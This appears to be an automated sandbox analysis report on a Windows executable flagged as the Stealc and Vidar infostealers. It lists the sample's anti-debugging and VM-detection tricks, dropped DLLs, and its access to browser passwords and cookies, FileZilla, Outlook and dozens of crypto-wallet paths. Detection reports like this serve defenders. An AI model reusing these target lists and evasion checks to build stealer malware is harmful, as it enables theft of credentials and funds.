Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80BF8 second address: 4D80BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80BFE second address: 4D80C0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12792CFFABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80C0D second address: 4D80C23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F127853B64Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80C23 second address: 4D80C7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F12792CFFAFh 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 movsx edi, ax 0x00000013 pushfd 0x00000014 jmp 00007F12792CFFACh 0x00000019 jmp 00007F12792CFFB5h 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 jmp 00007F12792CFFB3h 0x0000002a push esi 0x0000002b pop ebx 0x0000002c popad 0x0000002d rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D44427 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D66FF6 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00954910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00954910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0094DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0094DA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0094E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0094E430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0094F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0094F6B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00953EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00953EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_009416D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0094BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0094BE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_009538B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0094ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0094ED20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00954570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00954570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0094DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0094DE10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00941160 GetSystemInfo,ExitProcess, 0_2_00941160
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: file.exe, file.exe, 00000000.00000002.1911736710.0000000000D21000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1910986531.00000000006CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware=
Source: file.exe, 00000000.00000002.1910986531.0000000000744000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWM
Source: file.exe, 00000000.00000002.1910986531.00000000006CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1910986531.0000000000744000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1910986531.0000000000713000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: file.exe, 00000000.00000002.1911736710.0000000000D21000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009445C0 VirtualProtect ?,00000004,00000100,00000000 0_2_009445C0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00959860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00959860
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00959750 mov eax, dword ptr fs:[00000030h] 0_2_00959750
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009578E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA, 0_2_009578E0
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
Searches for specific processes (likely to inject)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00959600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00959600
Source: file.exe, file.exe, 00000000.00000002.1911736710.0000000000D21000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: :Program Manager
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00957B90
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00957980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 0_2_00957980
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00957850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00957850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00957A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00957A30

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.file.exe.940000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1910986531.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1684985635.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1911292762.0000000000941000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodu
Source: file.exe String found in binary or memory: |1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|Mul
Source: file.exe String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodu
Source: file.exe String found in binary or memory: |1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|Mul
Source: file.exe String found in binary or memory: iDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json
Source: file.exe String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodu
Source: file.exe String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodu
Source: file.exe String found in binary or memory: |1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|Mul
Source: file.exe String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodu
Source: file.exe String found in binary or memory: |1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|Mul
Source: file.exe String found in binary or memory: iDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json
Source: file.exe String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodu
Source: file.exe String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodu
Source: file.exe, 00000000.00000002.1910986531.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: rC:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: file.exe String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodu
Source: file.exe String found in binary or memory: iDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json
Source: file.exe String found in binary or memory: 0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledge
Source: file.exe String found in binary or memory: |1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|Mul
Source: file.exe String found in binary or memory: iDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json
Source: file.exe String found in binary or memory: |1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|Mul
Source: file.exe String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodu
Source: file.exe String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodu
Source: file.exe, 00000000.00000002.1910986531.0000000000799000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\*.*
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000002.1910986531.0000000000728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Stealc
